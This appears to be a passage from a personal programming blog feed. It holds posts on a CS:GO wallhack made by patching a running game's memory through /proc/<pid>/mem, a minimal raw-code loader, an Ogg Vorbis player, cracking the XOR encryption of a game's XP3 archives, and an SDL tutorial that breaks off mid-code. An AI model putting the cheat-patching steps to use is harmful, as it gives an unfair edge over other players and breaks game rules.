If we look for references to that address, we'll find a handful.</p> <pre><code>[0x006236aa]&gt; /r 0x065843c0 [0x01348782-0x01348904] data 0x6236b1 leaq 0x065843c0, %rdi in unknown function data 0x6236c3 leaq 0x065843c0, %rsi in unknown function data 0x7b7f57 movq 0x01bd5180, %rdi in unknown function data 0x7b901b movq 0x01bd5180, %rbx in unknown function data 0xc5ac60 movq 0x01bd5180, %rax in unknown function data 0xc664d4 leaq 0x065843c0, %rax in unknown function data 0xc7e86c leaq 0x065843c0, %rax in unknown function data 0xc8bc34 movq 0x01bd5180, %rax in unknown function data 0xd78699 movq 0x01bd5180, %rax in unknown function data 0xda8601 movq 0x01bd5180, %rax in unknown function data 0xda9d0f movq 0x01bd5180, %rax in unknown function data 0xe3db40 movq 0x01bd5180, %rax in unknown function </code></pre> <p class="indent">A little trial and error, combined with looking at the <a href="https://www.unknowncheats.me/forum/counterstrike-global-offensive/212843-mac-binaries-symbols.html">OSX binaries with symbols</a>, yields that 0xc664d4 is the address we're looking for - the function responsible for glowing.</p> <pre><code>0x00c664c0 e80be7b3ff callq 0x7a4bd0 0x00c664c5 84c0 testb %al, %al 0x00c664c7 0f84c3010000 je 0xc66690 0x00c664cd 488b3d24df91. movq 0x065843f8, %rdi ; [0x65843f8:8]=0 0x00c664d4 488d05e5de91. leaq 0x065843c0, %rax 0x00c664db 4839c7 cmpq %rax, %rdi ... </code></pre> <p class="indent">That first call is the actual check; the symbol for it in the OSX binaries is "CanSeeSpectatorOnlyTools". So if we patch the jump at 0x00c664c7, we should be able to see the glow effect as long as "spec_show_xray" is set to 1.</p> <p class="indent">This is pretty easy, since we just need to change 6 bytes.
I initially considered using dd(1) for this, but it doesn't seem to like touching procfs mem files, so instead we'll edit it from a python REPL.</p> <pre><code>[jakob@Epsilon ~]$ sudo grep -i client_client.so /proc/$(pidof csgo_linux64)/maps 7f5029915000-7f502b0e4000 r-xp 00000000 08:12 41426690 csgo/bin/linux64/client_client.so 7f502b0e4000-7f502b2e4000 ---p 017cf000 08:12 41426690 csgo/bin/linux64/client_client.so 7f502b2e4000-7f502b571000 rw-p 017cf000 08:12 41426690 csgo/bin/linux64/client_client.so [jakob@Epsilon ~]$ sudo python Python 3.6.2 (default, Jul 20 2017, 03:52:27) [GCC 7.1.1 20170630] on linux Type "help", "copyright", "credits" or "license" for more information. &gt;&gt;&gt; OFF = 0x7f5029915000 + 0x00c664c7 &gt;&gt;&gt; with open("/proc/9052/mem", "wb") as mem: ... mem.seek(OFF) ... mem.write(b"\x90" * 6) ... 139982284502215 6 &gt;&gt;&gt; </code></pre> <p>And it seems to work pretty well.</p> <p><img src="/img/CSGO_Wallhacks_1.png" alt="Wallhax in Action"></p> <p class="indent">I know I didn't go into a whole lot of depth about how you would actually come up with a cheat like this, but the reality is that a lot can be figured out using some basic reverse engineering skills. You already saw how much information leakage there is from a simple string reference. There's a lot of information out there already, including the source code for the <a href="https://github.com/ValveSoftware/source-sdk-2013">Source 2013 Base</a>. 
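</p> <p class="indent">The grep-through-maps step above is easy to automate, too. Here's a hypothetical helper (the name and structure are mine) that pulls a library's load address out of the text of /proc/&lt;pid&gt;/maps:</p>

```python
def library_base(maps_text, library):
    """Return the lowest mapped address of `library`, or None.

    `maps_text` is the content of /proc/<pid>/maps, where each
    line begins with "start-end" addresses in hex."""
    bases = [int(line.split("-")[0], 16)
             for line in maps_text.splitlines() if library in line]
    return min(bases) if bases else None
```

<p class="indent">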
I'd also recommend taking a look at the <a href="https://www.unknowncheats.me/forum/index.php">UnknownCheats</a> community if you're interested in learning more; they're (generally) helpful and quite friendly.</p> <p>Further Reading:</p> <p><a href="https://www.unknowncheats.me/forum/counterstrike-global-offensive/169923-cs-cheat-rookie-rookies.html">https://www.unknowncheats.me/forum/counterstrike-global-offensive/169923-cs-cheat-rookie-rookies.html</a></p> <p><a href="https://www.unknowncheats.me/forum/general-programming-and-reversing/133228-implement-pattern-scanning-obtain-offsets-dynamically.html">https://www.unknowncheats.me/forum/general-programming-and-reversing/133228-implement-pattern-scanning-obtain-offsets-dynamically.html</a></p> Analyzing Executable Size, part 0 - A Small, Proof-of-Concept Loader http://jakob.spaceAnalyzing+Executable+Size%2C+part+0+-+A+Small%2C+Proof-of-Concept+Loader http://jakob.spaceAnalyzing+Executable+Size%2C+part+0+-+A+Small%2C+Proof-of-Concept+Loader Mon, 31 Jul 2017 13:35:11 EST <p class="indent">It seems that static linking is back in style, or at least popular among all the hip new programming languages of today. I don't have anything against statically linked binaries, nor do I have a problem with larger executables, but I've noticed that the acceptable size for an executable is a lot larger now than it was a few years ago; that is, the new kids on the block have significantly more leeway than their predecessors. For example, a C program that spits out "hello world" is 7 KB when statically linked to musl. It's 12 KB when dynamically linked to glibc. The same program in D, where the reference compiler doesn't allow dynamic linking to the standard library, is 896 KB. A blog post I read recently about certificate chain verification in Go made a point of praising the toolchain for being able to spit out a binary that was "less than 6 MB!"
I'm being more facetious here than with my D example, as the Go binary was statically linked to an SSL-capable web server, but 6 MB is a little over half the size of a <a href="https://en.wikipedia.org/wiki/Tiny_Core_Linux">fully-functioning operating system</a>. I'm not so interested in why we settle for binaries the size of a few videos; instead, I'd like to look at why they're that large to begin with - to peer in and see what wealth of information is stored inside, and how certain programming languages make use of that information.</p> <p class="indent">Perhaps we should first take a step back. What is a binary, anyway? It's a structured format, not much different than your typical PNG or Ogg file, containing some machine code instructions and directives for how the program should be loaded into memory. The task of parsing the binary and actually loading it is done by a <strong>loader</strong>, though that's a pretty broad term. My favorite book on this subject, <em>Linkers and Loaders</em> by John R. Levine, defines a loader as a program to "copy a program from secondary storage (which since about 1968 invariably means a disk) into main memory so it's ready to be run. In some cases loading just involves copying the data from disk to memory, in others it involves allocating storage, setting protection bits, or arranging for virtual memory to map virtual addresses to disk pages."</p> <p class="indent">Loaders are everywhere, as you can probably imagine. Maybe you've heard of a boot loader; those are for getting a kernel into memory from the strange and unfamiliar land of x86 real mode. Whenever you run a program on Linux, it's loaded by the kernel's ELF loader, of which you can find the source code at <a href="https://github.com/torvalds/linux/blob/master/fs/binfmt_elf.c">fs/binfmt_elf.c</a> of the kernel source tree.
On a higher level, something like Java has a class loader for getting bytecode into memory so that the JVM can run it.</p> <p class="indent">As our first step into the world of loaders, we'll write our own. A very basic one, at that. I think that because we're taking a look at how much information can be stored inside of a binary, we should begin with the absolute minimum. It won't use a structured format, and it won't set up memory beyond the stack and a page for the executable code - and that page won't be at any specified address. Where that code exists in memory isn't known to the program, and it only really knows where the stack is from the %rsp register. We'll simply load some machine code from a file, and execute it. I'll spare you the per-line explanation I usually give, since it's reasonably simple and the only part you might not understand already is explained through comments.</p> <pre><code>#include &lt;sys/mman.h&gt; #include &lt;sys/stat.h&gt; #include &lt;stdio.h&gt; size_t binary_size(FILE *); int main(int argc, char **argv) { FILE *fp; void *exe; size_t exe_size; void (*jump)(void); if (argc != 2 || (fp = fopen(argv[1], "rb")) == NULL) { fprintf(stderr, "USAGE: %s [FILE]\n", argv[0]); return 1; } if ((exe_size = binary_size(fp)) == 0) { return 1; } /* Because writable memory pages are marked as non-executable by default, we need to map a new page of memory for our executable code. We do this by invoking the "mmap" syscall, and getting a new page from the kernel. */ exe = mmap(NULL, exe_size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_ANONYMOUS, -1, 0); if (exe == MAP_FAILED) { fprintf(stderr, "mmap failure.\n"); return 1; } fread(exe, exe_size, 1, fp); jump = exe; jump(); munmap(exe, exe_size); fclose(fp); return 0; } /* We'll use some POSIX standard functions because we can and they're generally safer than fseek and ftell.
*/ size_t binary_size(FILE *fp) { struct stat buf; if ((fstat(fileno(fp), &amp;buf) != 0) || (!S_ISREG(buf.st_mode))) { return 0; } return buf.st_size; } </code></pre> <p class="indent">Looks good! We can't use any of the binaries on our system to test it out, though. They're in some structured format like ELF, and the header would be interpreted as code - probably causing a segmentation fault. Even if it got past the header without a core dump, the binary probably relies on some absolute addressing that we didn't set up properly. So instead of running /bin/ls through our program, we'll assemble "hello world."</p> <pre><code> leaq (%rip), %rax addq $_msg_end - ., %rax jmpq *%rax _msg: .ascii "Hello, world!\n" _msg_end: movq $0x01, %rax movq $0x01, %rdi leaq (%rip), %rsi subq $. - _msg, %rsi movq $0x0e, %rdx syscall ret </code></pre> <p class="indent">What you'll probably notice immediately is that we're forced to write a position-independent executable. As I mentioned earlier, our loader can't handle absolute addresses. It can't really handle anything, aside from the most simple of x86 instructions. We do a <code>ret</code> at the very end to return control to the loader. Nothing left to do now but test it out:</p> <pre><code>[jakob@Epsilon ~]$ ./a.out test.bin Hello, world! </code></pre> <p class="indent">test.bin is 64 bytes and takes 0.001s to load and run. I probably could have made the program smaller, but I think it's a perfectly fine benchmark as we continue through this series. Keep in mind that 64 bytes is only achievable because we forgo the conveniences of modern loaders. We can only run position-independent code, there's no separation between data and code segments, no room for debugging symbols, no write protection on the code segment, nothing.
This is perhaps the most stripped-down loader you can get.</p> Making Your Own Music Player: A Gentle Introduction to Audio Programming http://jakob.spaceMaking+Your+Own+Music+Player%3A+A+Gentle+Introduction+to+Audio+Programming http://jakob.spaceMaking+Your+Own+Music+Player%3A+A+Gentle+Introduction+to+Audio+Programming Sat, 15 Jul 2017 18:56:34 EST <p class="indent">To start off, I'd like to say that I know very little about audio programming and digital audio in general. I've never formally studied signal processing, and hell, I haven't even started high school physics yet. This post merely documents what I've learned while trying to get sound working in my game, because there aren't really any other learning resources about this out there.</p> <p class="indent">In this tutorial, we'll write a basic music player for Ogg Vorbis in C using two awesome libraries from Xiph.Org. The first, libao, will provide us with a means to play sound through our speakers, or headphones, or whatever, and we'll use libvorbisfile to decode the Ogg Vorbis files.</p> <p class="indent">libao, like most other audio libraries, works by giving us a <em>PCM buffer</em> that we write sound data to, and that gets played back. <em>PCM</em> stands for Pulse-Code Modulation, and it's the basis of digital audio programming. You might have heard people talk about how analog audio is so much better than digital, and I think that learning the difference between the two helps to better understand digital audio. Historically, sound was recorded in terms of analog signals, which were easy to store as something like field strength on a magnetic medium. Digitizing audio, however, requires the signal to be sampled and quantized - that is, an instantaneous numeric representation of the signal is taken some number of times a second.
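</p> <p class="indent">If the sampling idea feels abstract, it's easy to demonstrate. The following sketch (my own, not part of the player we're about to write) samples a 440 Hz sine wave at 44.1 kHz and packs the result into the same little-endian 16-bit PCM we'll later be feeding libao.</p>

```python
import math
import struct

RATE = 44100       # samples per second
AMPLITUDE = 32000  # a bit under the 16-bit signed maximum of 32767

def sine_pcm(freq, seconds, rate=RATE):
    """Sample a sine wave `seconds` long, as little-endian 16-bit PCM."""
    count = int(rate * seconds)
    samples = [int(AMPLITUDE * math.sin(2 * math.pi * freq * n / rate))
               for n in range(count)]
    return struct.pack("<%dh" % count, *samples)

# One second of mono A440: 44,100 samples, 88,200 bytes of PCM.
pcm = sine_pcm(440, 1.0)
```

<p class="indent">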
The image below does a good job of explaining it, I think.</p> <p><img src="/img/Audio_Programming_1.png" alt="Analog vs Digital Audio"></p> <p class="indent">The rate at which the signal is sampled is the <em>frequency</em>. 44.1 kHz is typically the standard - meaning that 44,100 samples are taken every second. The number of <em>channels</em> is essentially how many speakers the sound is meant for. Stereo sound is the standard, so that is typically 2. And finally, the audio can be 8, 16, 24, or 32 bit, representing the size of the integer used to store each sample.</p> <p>Before we get into the code, you might need to configure libao if you're using PulseAudio. Just open it up in your favorite editor and change it as shown below.</p> <pre><code>$ sudo $EDITOR /etc/libao.conf # Change from default_driver=alsa dev=default # To default_driver=pulse # Make sure to remove the dev=default line </code></pre> <p>Now we're ready to get into the code. We'll include the headers for libao and libvorbisfile, as well as some standard library headers, and define the size of the PCM buffer, which I'll explain soon.</p> <pre><code>#include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;ao/ao.h&gt; #include &lt;vorbis/vorbisfile.h&gt; #define BUF_SIZE 256 </code></pre> <p class="indent">The program is actually simple enough that we can do everything in main. For clarity, I'll be using C99 variable declaration. Our program will take the file to play as a command-line argument, so the first thing we need to do is check argc.</p> <pre><code>if (argc != 2) { fprintf(stderr, "Usage: %s [PATH]\n", argv[0]); return 1; } </code></pre> <p>Next, we'll initialize libao. We'll also get the ID of the default sound driver for when we open an audio device later.</p> <pre><code>ao_initialize(); int default_driver = ao_default_driver_id(); </code></pre> <p class="indent">Now, we'll specify the output format we want.
This is what we were talking about earlier, about frequency and channels and such. The only part of this that wasn't mentioned was format.byte_format, which is just the byte order of the PCM buffer. The Vorbis decoder will work with either big or little endian, but we'll just stick with little endian for simplicity.</p> <pre><code>ao_sample_format format = {0}; format.bits = 16; format.channels = 2; format.rate = 44100; format.byte_format = AO_FMT_LITTLE; </code></pre> <p>We'll use this format structure to open an audio device with the default sound driver we figured out earlier.</p> <pre><code>ao_device *device = ao_open_live(default_driver, &amp;format, NULL); if (device == NULL) { fprintf(stderr, "Error opening device\n"); return 1; } </code></pre> <p class="indent">And now, we'll get our PCM buffer. Some audio libraries have a routine to give you a buffer, but libao is alright with us using pretty much anything, so we'll allocate it with malloc. At this point, maybe you're wondering why we use a buffer at all. While we <em>could</em> read and play one byte at a time, that would be very inefficient. It's better to read the data into a buffer, and then play that buffer. You don't want the buffer to be too large, though, as there will be a longer pause every time it has to be filled. You also don't want it to be too small. I find that 256 is good enough, but you can tweak that to your needs. The size should be a power of two.</p> <pre><code>char *buf = malloc(BUF_SIZE); if (buf == NULL) { fprintf(stderr, "Error allocating PCM buffer.\n"); return 1; } </code></pre> <p class="indent">Now, we'll initialize libvorbisfile, which is done by opening the file we want to play. This huge switch statement isn't necessary; it's just there to show all the possible status codes of ov_fopen.
Checking for a status code of 0 would be just fine here.</p> <pre><code>OggVorbis_File vf; switch (ov_fopen(argv[1], &amp;vf)) { case OV_EREAD: fprintf(stderr, "Couldn't open %s.\n", argv[1]); return 1; case OV_ENOTVORBIS: fprintf(stderr, "File contains no vorbis data.\n"); return 1; case OV_EVERSION: fprintf(stderr, "Vorbis version mismatch.\n"); return 1; case OV_EBADHEADER: fprintf(stderr, "File contains a bad bitstream header.\n"); return 1; case OV_EFAULT: fprintf(stderr, "Failure induced by heap/stack corruption.\n"); return 1; } </code></pre> <p>The real meat and potatoes of the program comes next: a loop that continually reads data into our PCM buffer and plays it, until there's no more data to play. Note that we only play the number of bytes ov_read actually returned - the last read will usually come up short of BUF_SIZE.</p> <pre><code>int read, bitstream; do { read = ov_read(&amp;vf, buf, BUF_SIZE, 0, 2, 1, &amp;bitstream); if (read &gt; 0) { ao_play(device, buf, read); } } while (read &gt; 0); </code></pre> <p class="indent">The random integer constants in the call to <code>ov_read</code> might be a bit intimidating, but they're really nothing to worry about. The first is whether or not the PCM buffer is big endian (which it is not, so we pass 0), the second is the sample size, where 2 represents 16-bit, and the third is whether or not the data is signed. You can read more about them in <a href="https://xiph.org/vorbis/doc/vorbisfile/ov_read.html">the documentation</a>.</p> <p class="indent">Hopefully, things are starting to click now. Any sound that comes out of your speakers is just a bunch of numbers, and file formats like Ogg and MP3 are just a means of compressing those numbers.</p> <p>And finally, we'll finish up with some cleanup.</p> <pre><code>free(buf); ov_clear(&amp;vf); ao_close(device); ao_shutdown(); return 0; </code></pre> <p>Compilation is pretty easy, too.</p> <pre><code>$ gcc -o oggplay oggplay.c -lvorbisfile -lao </code></pre> <p>Pretty painless, right? Without error handling, this is about 21 lines of code.</p> <p>Go ahead, try it out!
If you don't save your music as Ogg Vorbis, you can convert songs with ffmpeg:</p> <pre><code>$ ffmpeg -i [file] -c:a libvorbis song.ogg </code></pre> <p>Here are some exercises if you want to play with this more:</p> <ul> <li>Get the frequency from the file being played, rather than hardcoding it at 44.1 kHz. Check out the <a href="https://xiph.org/vorbis/doc/vorbisfile/reference.html">file Information section of the documentation</a>.</li> <li>Add a status line showing the current timestamp.</li> <li>Watch <a href="https://www.youtube.com/watch?v=pFgui9uGmr4">this talk from SIGINT13</a>.</li> <li>Play two sounds at once by adding their PCM values. Keep in mind that 8-bit and 16-bit integers overflow quite easily.</li> <li>Learn the library for another audio codec/container, like libopenmpt for classic tracker music.</li> <li>If you're feeling particularly up to a challenge, try rewriting the player using just libvorbis and libogg, rather than libvorbisfile.</li> </ul> Reverse Engineering Babby's First Archive Format http://jakob.spaceReverse+Engineering+Babby%27s+First+Archive+Format http://jakob.spaceReverse+Engineering+Babby%27s+First+Archive+Format Thu, 2 Mar 2017 15:25:09 EST <p class="indent">About two months have passed since the first release of Nekopack - a tool I wrote for extracting game data from Nekopara's XP3 archives. While the process wasn't an amazing reverse-engineering war story that will keep you on the edge of your seat, I feel it deserves a small blog post explaining how I did it. Additionally, there's no real documentation on the XP3 format as far as I'm aware, so hopefully this post will serve as an informal specification.</p> <p class="indent">The first step I took was to see if anyone else had tried to reverse it. Even something as simple as a writeup would have made my goal significantly more attainable. 
The closest thing I was able to find was <a href="https://github.com/vn-tools/arc_unpacker">Arc Unpacker</a>, a tool capable of extracting several archive formats, including XP3. However, attempting to use it revealed that Nekopara's archives are encrypted. Further searching yielded nothing of interest, so it seemed that the solution was to write a tool of my own. I chose to write it from scratch, as I couldn't predict how complex the encryption algorithm would be.</p> <p class="indent">Writing a tool to work with an archive format, however, requires a very thorough understanding of how it's structured. Instinctively, I fired up my favorite hex editor and went at it, with the <a href="https://github.com/vn-tools/arc_unpacker/blob/master/src/dec/kirikiri/xp3_archive_decoder.cc">source code of Arc Unpacker</a> open to help figure most of it out.</p> <p><img src="/img/Nekopack_1.png" alt="Hex view of the XP3 header"></p> <p class="indent">The first section of the archive is the header. It begins with an 11-byte "magic number," used by whatever program is opening it as a sanity check. It's followed by a 64-bit offset which, for XP3 version 2, points to a few adjacent values: first, an 8-bit integer that I've been told acts as a flags variable, followed by a 64-bit integer representing the table's size, and finally another 64-bit integer containing an offset to the beginning of the table section. The flags variable, to my knowledge, should have the 0x80 bit set; it's a constant defined in the code of the KiriKiriZ engine that I presume marks compatibility with the game engine.
Byte 0x13 is a 32-bit unsigned integer representing the version, where a value of 1 represents version 2 of the archive.</p> <p>The header can be represented as the following C struct.</p> <pre><code>struct header { char magic[11]; uint64_t info_offset; uint32_t version; uint8_t flags; uint64_t table_size; uint64_t table_offset; }; </code></pre> <p class="indent">Seeking to the table, we find that it starts with some metadata: first, an 8-bit unsigned integer representing whether or not the contents of the archive are compressed. That's followed by a 64-bit unsigned integer representing the compressed size of the table, and another 64-bit unsigned integer representing the decompressed size. The table's contents are compressed using LZ77 and Huffman coding - in other words, DEFLATE - so let's use zlib! I proceeded to inflate the table according to the header and dumped it so that I could view it in my hex editor.</p> <p><img src="/img/Nekopack_2.png" alt="Binary dump"></p> <p class="indent">Every entry has a header containing a 32-bit magic number (underlined in red), followed by a 64-bit unsigned integer representing the size of the entry. It's a very simple format to parse. This very first entry, 0x656c6946, is an "eliF" entry. It contains a UTF-16LE encoded filename and a "key", which is used to associate the eliF entry with its corresponding File entry. That key is also used when decrypting the file, but we'll get into that later on.</p> <p class="indent">The next visible chunk is a "File" entry. There's a lot in it, so it's broken up into several parts: "info", "segm", "adlr", and "time." The adlr chunk is pretty small and contains only the key, used to match the File entry to an eliF entry. The time chunk is also pretty small, containing a UNIX timestamp for the file creation date. What's a little more interesting are the two remaining chunks. segm has offsets to the beginning of the file, and it can actually contain several "segments."
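</p> <p class="indent">The header layout described above can be captured in a few lines of Python. This is a sketch based purely on my reading of the format - the field order follows the prose, little-endian byte order is an assumption on my part, the magic in the test data is a placeholder, and no validation is done.</p>

```python
import struct

def parse_xp3_header(data):
    """Parse the XP3 header fields described above from raw bytes."""
    magic = data[:11]                                   # 11-byte magic number
    (info_offset,) = struct.unpack_from("<Q", data, 11)
    (version,) = struct.unpack_from("<I", data, 0x13)   # 1 means "version 2"
    # At the info offset: flags (u8), table size (u64), table offset (u64).
    flags, table_size, table_offset = struct.unpack_from("<BQQ", data, info_offset)
    return {"magic": magic, "version": version, "flags": flags,
            "table_size": table_size, "table_offset": table_offset}
```

<p class="indent">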
The file chunks specified in segm are also compressed with LZ77 and Huffman Coding. info contains a flags variable, a compressed and decompressed size, and what seems to be an MD5 hash of the file.</p> <p><img src="/img/Nekopack_3.png" alt="Basic parsing"></p> <p class="indent">Now we run into the problem of the files' contents being encrypted. I began by setting up a debugger to reverse engineer the binary. x64dbg isn't my usual choice, especially not with Intel syntax, but it was the first thing I was really able to get working. Of course, using the debugger alone is a little primitive. We have other tools to make reverse engineering easier.</p> <p><img src="/img/Nekopack_4.png" alt="Catching file reads"></p> <p class="indent">Enter procmon. It's reminiscent of strace, but it's meant for Windows and has a nice stack trace feature which helps us locate the code that decrypts the archive. This is the point where I got stuck, having to deal with threads. It was mostly "guns blazing" debugging. I stepped through the code mindlessly for a few days, until one night, before going to bed, I decided to take another look online to see whether someone had cracked it yet. Then I found <a href="https://bitbucket.org/SmilingWolf/xp3tools-updated">something interesting</a>.</p> <p class="indent">It felt a little too easy, but I had already written the unpacking part, so I wrote code to decrypt buffers and copied the encryption keys into my own code. The encryption is symmetric and extremely simple: just single-key XOR. A base key is first derived by XORing the game's master key with the file key I mentioned earlier. Then a one-byte key is derived from that base key by XORing its bytes together. For some games, the least significant byte of the base key is used to encrypt the first byte of the file.
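</p> <p class="indent">To make that concrete, here's a minimal sketch of the scheme in C. The 32-bit key width is an assumption for illustration, and this is not Nekopack's exact code (the real master keys are game-specific):</p>

```c
#include <stdint.h>
#include <stddef.h>

/* A sketch of the scheme described above, with assumed 32-bit keys.
 * The one-byte key is derived by XORing together the bytes of the
 * base key (master key XOR per-file key). */
static uint8_t derive_one_byte_key(uint32_t base_key)
{
    uint8_t key = 0;
    for (int i = 0; i < 4; i++)
        key ^= (uint8_t) (base_key >> (8 * i));
    return key;
}

static void decrypt_buffer(uint8_t *data, size_t len,
                           uint32_t master_key, uint32_t file_key)
{
    uint32_t base_key = master_key ^ file_key;
    uint8_t  key      = derive_one_byte_key(base_key);

    /* Some games additionally XOR the first byte with the least
     * significant byte of the base key; that variation is omitted
     * here for simplicity. */
    for (size_t i = 0; i < len; i++)
        data[i] ^= key;
}
```

<p class="indent">Since XOR is its own inverse, running the same routine over a buffer twice gives back the original bytes, which makes it easy to sanity-check.</p> <p class="indent">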
The game has default values to fall back to if either of those keys is too simple.</p> <p class="indent">Since the script I found only had the keys for volumes 0 and 1, I decided to try to recover the key for volume 2 on my own. Now that I knew the encryption algorithm, I could break it without having to disassemble the game.</p> <p class="indent">It's pretty simple. Most binary files have a "magic number" associated with them, which allows us to perform a known-plaintext attack. Pair that with the fact that the first byte of each file is encrypted with the least significant byte of the base key, and you've got yourself a cracking process simple enough to do in <a href="https://github.com/TsarFox/nekopack/blob/master/other/find_key.py">about 100 lines of Python</a>.</p> SDL Tutorial Part 0x00 - Boilerplate, Windowing and Rendering http://jakob.spaceSDL+Tutorial+Part+0x00+-+Boilerplate%2C+Windowing+and+Rendering Sun, 14 Aug 2016 21:02:56 EST <p class="indent">This is one of my older tutorials and follows a style unlike my current one. I also no longer stand by the claims I originally made about the SDL documentation in this article. I now think it's perfectly fine; you just need to spend some time looking around, because it isn't organized the way other documentation is. For that reason, I have no plans to continue this tutorial series unless someone specifically asks me to continue it.</p> <p class="indent">SDL2 is my favorite graphics library right now. It might not be as powerful as something like raw OpenGL, but it's simple. Simple enough that you can just pick it up and start using it. There's a glaring issue with it, though. The documentation is horrible. Absolutely horrible. A lot of it is unfinished, and it doesn't look like it's getting attention any time soon.
The SDL1.2 documentation wasn't as bad, but that version of the library is vastly outdated by today's standards. So here's my take on a tutorial for SDL: part 0x00 of an I-don't-know-how-long-I'm-going-to-drag-this-on series. My examples are going to be written in C, because the constructs I show here can still be used verbatim in C++ (and probably in SDL's other language bindings as well). This tutorial will cover the little boilerplate that SDL requires, as well as the basics of windowing and rendering. Let's get into it.</p> <p class="indent">The first thing you have to worry about is installing and setting up SDL 2.0. I won't cover it in detail because it's something you should be able to figure out yourself. If your operating system doesn't provide a means of package management, you should be able to find a download on the <a href="https://libsdl.org/">official website</a>.</p> <p class="indent">You should also figure out how to link SDL2 when you're compiling; nothing I teach here will work if it isn't properly linked. If you're having trouble with anything, fire up your favorite search engine or feel free to <a href="http://tsar-fox.com/">contact me</a>.</p> <p class="indent">Alright, assuming you've successfully installed SDL, let's get to actually programming. As with any C library, the first thing you should worry about is including the header files. While SDL provides header files for specific subsystems, we're not going to worry about those right now. There's a header file that contains everything, and we're going to use that for now.</p> <pre><code>#include &lt;SDL2/SDL.h&gt; </code></pre> <p>Depending on how header files are organized on your system, you may have to use this instead:</p> <pre><code>#include &lt;SDL.h&gt; </code></pre> <p class="indent">That will give us function prototypes and type definitions for everything in the SDL library, but we have to initialize SDL before we can really do anything with it.
This is actually really simple, done with a single function call.</p> <pre><code>SDL_Init(SDL_INIT_VIDEO); </code></pre> <p class="indent">SDL_Init takes a flag as a parameter so it knows which subsystems to initialize. <em>A</em> parameter. One, not several. This might be a bit confusing to some, especially if you're not familiar with bitwise arithmetic, but SDL_INIT_VIDEO is nothing more than a preprocessor macro representing some number. SDL_Init interprets that number and initializes the subsystems associated with it. We don't write the number out in our code, though (or at least you shouldn't). We use the macros, but there aren't macros for every combination of subsystems you can come up with. Does this mean that SDL can only initialize one subsystem at a time? Not at all. To combine macros and represent multiple subsystems, you hook them together with the <a href="https://en.wikipedia.org/wiki/Bitwise_operation#OR">bitwise OR operator</a> (|, not ||). For example, if we wanted to initialize SDL's video AND audio subsystems, we would do this:</p> <pre><code>SDL_Init(SDL_INIT_VIDEO | SDL_INIT_AUDIO); </code></pre> <p>But we're not going to be working with audio just yet.</p> <p class="indent">SDL_Init also returns an integer value, and it's pretty important. If it's zero, SDL was initialized properly. Great! But if SDL can't be initialized for some reason, it will return a negative number. This is where another SDL function comes into the picture. SDL_GetError takes no arguments and returns a string explaining what went wrong. So if we wanted to do some error checking (which you always should), we could do this:</p> <pre><code>if (SDL_Init(SDL_INIT_VIDEO)) { fprintf(stderr, "Here's the error: %s\n", SDL_GetError()); return 1; } </code></pre> <p>You can pretty much do anything here to handle the error.
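</p> <p class="indent">Since the flag machinery is ordinary bit arithmetic, it can be demonstrated without SDL at all. The flag values below are made up for illustration; the real SDL_INIT_* macros are defined in SDL.h with different values:</p>

```c
#include <stdint.h>

/* Made-up flag values for illustration only; the real SDL_INIT_*
 * macros are defined in SDL.h with different values. Each flag gets
 * its own bit, so ORing them together never loses information. */
#define DEMO_INIT_VIDEO 0x01u
#define DEMO_INIT_AUDIO 0x02u
#define DEMO_INIT_TIMER 0x04u

/* Check whether a combined flags value includes a given subsystem. */
static int has_flag(uint32_t flags, uint32_t flag)
{
    return (flags & flag) != 0;
}
```

<p>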
I'm using fprintf for simplicity, but SDL provides more advanced logging features which I'll cover in a later tutorial.</p> <p class="indent">In SDL, you need to be responsible and clean up after yourself. For every function that initializes or creates something, there is a complementary function that deinitializes or destroys it. The counterpart to SDL_Init is SDL_Quit. It takes no parameters and returns nothing; you can just call it and be done with it. With that covered, we've learned SDL's few lines of boilerplate code. Much more appealing than something like Direct3D, eh? If you compile and run the program right now, nothing interesting will happen. It initialized and deinitialized SDL (unless something went wrong), but didn't bother creating windows or doing anything else, because we didn't tell it to. Let's change that. We first have to know about two important typedefs in SDL: <strong>SDL_Window and SDL_Renderer.</strong> SDL_Window is self-explanatory: it's a struct representing a window. SDL_Renderer is how you put something into a window. Renderers in SDL are capable of hardware acceleration and vertical sync, which is why SDL2 is awesome and SDL1.2 is left in the dust. These are just structs, though; they don't do anything by themselves. Let's create a window, and capture it in an SDL_Window pointer:</p> <pre><code>SDL_Window *my_cool_window = SDL_CreateWindow("A Cool Window", SDL_WINDOWPOS_UNDEFINED, SDL_WINDOWPOS_UNDEFINED, 400, 400, SDL_WINDOW_SHOWN); </code></pre> <p class="indent">Whoa, that's a mouthful, but it isn't as complicated as it looks. The first argument is just a title for the window; you can name it whatever you want. The next two arguments are X and Y values for where the window should be placed on the screen. People usually don't care about this; you can use SDL_WINDOWPOS_UNDEFINED if you don't. After that are the window's width and height.
I'm choosing to make my window 400 by 400 pixels, but you can choose whatever size works best for your program. There are ways to change it later on, too. Finally, we get to a flag. Its usage is similar to the flag we passed to SDL_Init: you use a bitwise OR to combine flags. We're not doing anything fancy just yet, though, so SDL_WINDOW_SHOWN on its own will suffice. It ensures that the window will be visible, rather than minimized.</p> <p class="indent">As you can hopefully tell from the example code above, SDL_CreateWindow returns a pointer of type SDL_Window. If a window cannot be created, though, it will return NULL. You should always do error checking, so throw something in to see if my_cool_window (or whatever you named your window variable) is NULL:</p> <pre><code>if (!my_cool_window) { fprintf(stderr, "Window couldn't be created. %s\n", SDL_GetError()); return 1; } </code></pre> <p class="indent">There's SDL_GetError again! He's our friend, and you should be using him every time you do error checking.<br>Remember how I said that SDL has a complementary function to destroy anything that is created? This is no exception. SDL_DestroyWindow is very similar to SDL_Quit, but it takes an SDL_Window pointer as an argument.</p> <pre><code>SDL_DestroyWindow(my_cool_window); </code></pre> <p class="indent">It's sad to see him go, but we're done, so we need to free the resources. At this point, you can compile and run the C source file. It still kinda sucks, though. When you run it, the window pops up and immediately goes away. One useful function is SDL_Delay. It might seem mundane now, but it will become quite important when we need to cap our program's framerate. It takes a number of milliseconds as a parameter and temporarily stops your program so that SDL and your computer can take a short break. Alright.
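</p> <p class="indent">As an aside on the framerate capping I just mentioned: the arithmetic behind it is nothing more than subtracting the time a frame took from the frame's time budget. Here's a sketch of that calculation in plain C; the function name is my own, and real code would measure the elapsed time with something like SDL_GetTicks:</p>

```c
#include <stdint.h>

/* Sketch of the framerate-capping arithmetic: given a target FPS and
 * how long the current frame took, return how many milliseconds are
 * left in the frame's time budget (0 if the frame overran it). The
 * result is what you would hand to SDL_Delay. */
static uint32_t remaining_delay_ms(uint32_t target_fps, uint32_t frame_ms)
{
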